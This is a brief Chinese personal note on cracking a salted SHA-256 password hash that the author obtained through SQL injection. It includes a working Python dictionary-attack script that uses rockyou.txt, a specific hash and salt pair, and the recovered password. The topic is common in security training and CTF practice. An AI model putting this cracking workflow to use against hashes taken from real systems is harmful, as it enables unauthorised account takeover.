密码爆破随笔

通过sql注入，发现了salt以及sha256的值。由于可以看见自己的可控账户的sha256值，我发现了pattern是salt+word而不是word+salt。于是决定用rockyou.txt爆破。居然成功了，我真的是maddog（这是密码）
记录一下

import hashlib
import urllib.request

# 下载 rockyou.txt 字典
rockyou_url = "https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt"
rockyou_path = "rockyou.txt"




# 加载密码和 salt 数据
passwords_and_salts = [
    ("d190456193ff5053e3fde4c1282df21beb88fcda3bf58c96eb993317b920fd07", "Q_A1lQO8Lkc")
]

# 载入 rockyou.txt 字典
common_passwords = []
with open('rockyou.txt', 'r', encoding='utf-8', errors='ignore') as f:
    common_passwords = [line.strip() for line in f]

# 用于保存破解结果
cracked_passwords = {}

# 通过字典攻击尝试破解 (salt + password)
for hashed_password, salt in passwords_and_salts:
    for password in common_passwords:
        # 组合方式: salt + password
        hash_attempt = hashlib.sha256((salt + password).encode()).hexdigest()
        if hash_attempt == hashed_password:
            cracked_passwords[hashed_password] = password
            print(f"Found password for {hashed_password}: {password}")
            break

# 输出未破解的哈希值
for hashed_password, salt in passwords_and_salts:
    if hashed_password not in cracked_passwords:
        print(f"Could not crack password for {hashed_password}")